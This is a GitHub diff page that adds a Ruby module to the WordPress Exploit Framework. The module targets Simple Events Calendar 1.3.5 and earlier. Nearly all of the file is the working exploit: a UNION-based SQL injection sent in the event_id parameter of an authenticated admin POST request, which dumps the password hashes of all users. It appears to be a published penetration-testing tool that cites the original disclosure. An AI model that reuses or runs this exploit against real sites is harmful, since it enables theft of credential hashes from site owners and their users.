This repository was archived by the owner on Oct 22, 2020. It is now read-only.
File tree Expand file tree Collapse file tree 1 file changed +69
-0
lines changed Expand file tree Collapse file tree 1 file changed +69
-0
lines changed Original file line number Diff line number Diff line change
1
+ # frozen_string_literal: true
2
+
3
+ class Wpxf ::Auxiliary ::SimpleEventsCalendarHashDump < Wpxf ::Module
4
+ include Wpxf ::WordPress ::HashDump
5
+
6
+ def initialize
7
+ super
8
+
9
+ update_info (
10
+ name : 'Simple Events Calendar <= 1.3.5 Authenticated Hash Dump' ,
11
+ desc : %(
12
+ Simple Events Calendar <= 1.3.5 contains an SQL injection vulnerability
13
+ which can be leveraged by all registered users with the permission
14
+ to manage events. This module utilises this vulnerability
15
+ to dump the hashed passwords of all users in the database.
16
+ ) ,
17
+ author : [
18
+ 'Lenon Leite' , # Disclosure
19
+ 'Rob Carr <rob[at]rastating.com>' # WPXF module
20
+ ] ,
21
+ references : [
22
+ [ 'WPVDB' , '8955' ] ,
23
+ [ 'URL' , 'http://lenonleite.com.br/en/blog/2017/11/03/simple-events-calendar-1-3-5-wordpress-plugin-sql-injection/' ]
24
+ ] ,
25
+ date : 'Nov 03 2017'
26
+ )
27
+ end
28
+
29
+ def check
30
+ check_plugin_version_from_readme ( 'simple-events-calendar' , '1.3.6' )
31
+ end
32
+
33
+ def requires_authentication
34
+ true
35
+ end
36
+
37
+ def reveals_one_row_per_request
38
+ true
39
+ end
40
+
41
+ def hashdump_request_method
42
+ :post
43
+ end
44
+
45
+ def hashdump_request_params
46
+ {
47
+ 'page' => 'simple-events'
48
+ }
49
+ end
50
+
51
+ def hashdump_request_body
52
+ {
53
+ 'edit' => '1' ,
54
+ 'event_id' => "-#{ Utility ::Text . rand_numeric ( 2 ) } union #{ hashdump_sql_statement } #"
55
+ }
56
+ end
57
+
58
+ def hashdump_visible_field_index
59
+ 3
60
+ end
61
+
62
+ def hashdump_number_of_cols
63
+ 9
64
+ end
65
+
66
+ def vulnerable_url
67
+ normalize_uri ( wordpress_url_admin , 'admin.php' )
68
+ end
69
+ end
You can’t perform that action at this time.
0 commit comments